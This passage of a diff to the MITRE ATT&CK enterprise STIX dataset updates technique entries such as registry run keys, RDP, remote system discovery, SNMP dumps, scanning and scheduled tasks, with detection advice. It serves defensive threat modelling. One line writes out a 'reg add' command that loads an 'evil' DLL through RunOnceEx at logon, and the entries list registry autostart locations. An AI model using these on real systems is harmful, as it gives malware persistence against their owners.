HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", + "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "id": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "type": "attack-pattern", "kill_chain_phases": [ @@ -21993,9 +25367,9 @@ "phase_name": "privilege-escalation" } ], - "modified": "2020-03-25T16:16:26.182Z", + "modified": "2020-08-03T16:30:26.918Z", "created": "2020-01-23T22:02:48.566Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "Administrator", @@ -22289,7 +25663,7 @@ { "source_name": "Mandiant M-Trends 2020", "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." } ], "object_marking_refs": [ @@ -22306,7 +25680,7 @@ "phase_name": "collection" } ], - "modified": "2020-06-24T18:59:15.833Z", + "modified": "2020-09-14T19:48:07.491Z", "created": "2020-03-13T21:14:58.206Z", "x_mitre_contributors": [ "Praetorian" @@ -22374,6 +25748,22 @@ "created": "2017-05-31T21:30:59.769Z" }, { + "created": "2020-02-11T18:23:26.059Z", + "modified": "2020-02-25T19:23:34.204Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)", + "name": "Remote Desktop Protocol", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -22396,42 +25786,26 @@ "source_name": "Alperovitch Malware" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Remote Desktop Protocol", - "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)", - "id": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "lateral-movement" - } - ], - "modified": "2020-02-25T19:23:34.204Z", - "created": "2020-02-11T18:23:26.059Z", - "x_mitre_contributors": [ - "Matthew Demaske, Adaptforward" - ], - "x_mitre_system_requirements": [ - "RDP service enabled, account in the Remote Desktop Users group" + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.", + "x_mitre_permissions_required": [ + "Remote Desktop Users", + "User" ], "x_mitre_data_sources": [ "Process monitoring", "Netflow/Enclave netflow", "Authentication logs" ], - "x_mitre_permissions_required": [ - "Remote Desktop Users", - "User" + "x_mitre_system_requirements": [ + "RDP service enabled, account in the Remote Desktop Users group" ], - "x_mitre_detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_platforms": [ - "Windows" + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward" ] }, { @@ -22592,10 +25966,18 @@ ] }, { - "id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Remote System Discovery", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.\n\nWithin IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.(Citation: Amazon Describe Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.(Citation: Google Compute Instances)(Citation: Azure VM List)", + "created": "2017-05-31T21:30:28.187Z", + "modified": "2020-09-17T12:26:53.669Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "type": "attack-pattern", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -22606,69 +25988,34 @@ "external_id": "CAPEC-292", "source_name": "capec", "url": "https://capec.mitre.org/data/definitions/292.html" - }, - { - "source_name": "Amazon Describe Instances API", - "url": "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html", - "description": "Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020." - }, - { - "source_name": "Amazon Describe Instances CLI", - "url": "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html", - "description": "Amazon. (n.d.). describe-instances. Retrieved May 26, 2020." - }, - { - "source_name": "Google Compute Instances", - "url": "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list", - "description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020." - }, - { - "source_name": "Azure VM List", - "url": "https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest", - "description": "Microsoft. (n.d.). az vm. Retrieved May 26, 2020." } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.", + "name": "Remote System Discovery", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "x_mitre_version": "3.0", + "x_mitre_data_sources": [ + "Network protocol analysis", + "Process monitoring", + "Process use of network", + "Process command-line parameters" ], - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "discovery" - } - ], - "modified": "2020-05-26T15:02:19.656Z", - "created": "2017-05-31T21:30:28.187Z", - "x_mitre_is_subtechnique": false, - "x_mitre_contributors": [ - "Praetorian", - "RedHuntLabs, @redhuntlabs" + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], "x_mitre_permissions_required": [ "User", "Administrator", "SYSTEM" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows", - "GCP", - "Azure", - "AWS" + "x_mitre_contributors": [ + "RedHuntLabs, @redhuntlabs" ], - "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, the usage of particular commands or APIs to request information about remote systems may be common. Where possible, anomalous usage of these commands and APIs or the usage of these commands and APIs in conjunction with additional unexpected commands may be a sign of malicious use. Logging methods provided by cloud providers that capture history of CLI commands executed or API usage may be utilized for detection.", - "x_mitre_data_sources": [ - "Azure activity logs", - "Stackdriver logs", - "AWS CloudTrail logs", - "Network protocol analysis", - "Process monitoring", - "Process use of network", - "Process command-line parameters" - ], - "x_mitre_version": "2.1" + "x_mitre_is_subtechnique": false }, { "external_references": [ @@ -23699,6 +27046,65 @@ "SMB enabled; Host/network firewalls not blocking SMB ports between source and destination; Use of domain account in administrator group on remote system or default system admin account." ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1602.001", + "url": "https://attack.mitre.org/techniques/T1602/001" + }, + { + "source_name": "SANS Information Security Reading Room Securing SNMP Securing SNMP", + "url": "https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051", + "description": "Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020." + }, + { + "source_name": "US-CERT-TA18-106A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + }, + { + "source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", + "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3", + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SNMP (MIB Dump)", + "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ", + "id": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "modified": "2020-10-22T01:54:22.812Z", + "created": "2020-10-19T23:51:05.953Z", + "x_mitre_data_sources": [ + "Netflow/Enclave netflow", + "Network protocol analysis", + "Packet capture" + ], + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "x_mitre_platforms": [ + "Network" + ] + }, { "external_references": [ { @@ -23978,6 +27384,82 @@ "Anastasios Pingios" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.005", + "url": "https://attack.mitre.org/techniques/T1596/005" + }, + { + "source_name": "Shodan", + "url": "https://shodan.io", + "description": "Shodan. (n.d.). Shodan. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Scan Databases", + "description": "Before compromising a victim, adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "id": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:20:18.786Z", + "created": "2020-10-02T17:00:44.586Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1595.001", + "url": "https://attack.mitre.org/techniques/T1595/001" + }, + { + "source_name": "Botnet Scan", + "url": "https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf", + "description": "Dainotti, A. et al. (2012). Analysis of a \u201c/0\u201d Stealth Scan from a Botnet. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Scanning IP Blocks", + "description": "Before compromising a victim, adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "id": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:06:09.139Z", + "created": "2020-10-02T16:54:23.193Z", + "x_mitre_data_sources": [ + "Packet capture", + "Network device logs" + ], + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -24053,9 +27535,27 @@ ] }, { - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "created": "2017-05-31T21:30:46.977Z", + "modified": "2020-10-14T15:20:01.069Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } ], + "type": "attack-pattern", + "id": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).", "external_references": [ { "source_name": "mitre-attack", @@ -24073,58 +27573,40 @@ "source_name": "TechNet Task Scheduler Security" } ], - "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).", - "name": "Scheduled Task/Job", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "id": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "execution" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "persistence" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "privilege-escalation" - } + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "modified": "2020-03-24T13:45:04.006Z", - "created": "2017-05-31T21:30:46.977Z", - "x_mitre_is_subtechnique": false, - "x_mitre_version": "2.0", - "x_mitre_contributors": [ - "Prashant Verma, Paladion", - "Leo Loobeek, @leoloobeek", - "Travis Smith, Tripwire", - "Alain Homewood, Insomnia Security" + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" ], + "x_mitre_remote_support": true, + "x_mitre_effective_permissions": [ + "SYSTEM", + "Administrator", + "User" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "User" + ], + "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_data_sources": [ "File monitoring", "Process monitoring", "Process command-line parameters", "Windows event logs" ], - "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", - "x_mitre_permissions_required": [ - "Administrator", - "SYSTEM", - "User" + "x_mitre_contributors": [ + "Prashant Verma, Paladion", + "Leo Loobeek, @leoloobeek", + "Travis Smith, Tripwire", + "Alain Homewood, Insomnia Security" ], - "x_mitre_effective_permissions": [ - "SYSTEM", - "Administrator", - "User" - ], - "x_mitre_remote_support": true, - "x_mitre_platforms": [ - "Windows", - "Linux", - "macOS" - ] + "x_mitre_version": "2.0", + "x_mitre_is_subtechnique": false }, { "id": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", @@ -24377,6 +27859,239 @@ "x_mitre_is_subtechnique": false, "x_mitre_deprecated": true }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1597", + "url": "https://attack.mitre.org/techniques/T1597" + }, + { + "source_name": "D3Secutrity CTI Feeds", + "url": "https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/", + "description": "Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020." + }, + { + "source_name": "ZDNET Selling Data", + "url": "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/", + "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Search Closed Sources", + "description": "Before compromising a victim, adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", + "id": 